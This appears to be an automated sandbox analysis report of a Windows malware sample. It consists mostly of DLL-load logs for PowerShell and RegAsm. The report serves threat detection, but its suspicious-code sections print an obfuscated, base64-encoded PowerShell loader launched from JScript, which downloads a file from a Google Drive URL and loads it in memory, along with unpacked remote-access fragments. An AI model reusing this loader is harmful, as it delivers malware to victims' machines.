Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textinputframework.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: avicap32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvfw32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: shellExecute("powershell" , " -command " + CZJBG + "powershell" + " $jPhaA", "", "Open", 0) ;IHost.ScriptFullName();IShellDispatch6.ShellExecute("powershell", " -command $jPhaA = 'JA' + [char]66 + '2", "", "Open", "0")

.NET source code contains method to dynamically call methods (often used by packers)

Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 4.2.powershell.exe.177da235a08.1.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 4.2.powershell.exe.177d903f890.0.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 20.2.powershell.exe.20ece614e80.1.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 20.2.powershell.exe.20ee61e0000.2.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 28.2.powershell.exe.1e6806fafa8.0.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 36.2.powershell.exe.1de3d91b8a8.0.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 44.2.powershell.exe.1558669b658.1.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 53.2.powershell.exe.1d3333dc4d0.1.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACw
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' )

Suspicious powershell command line found

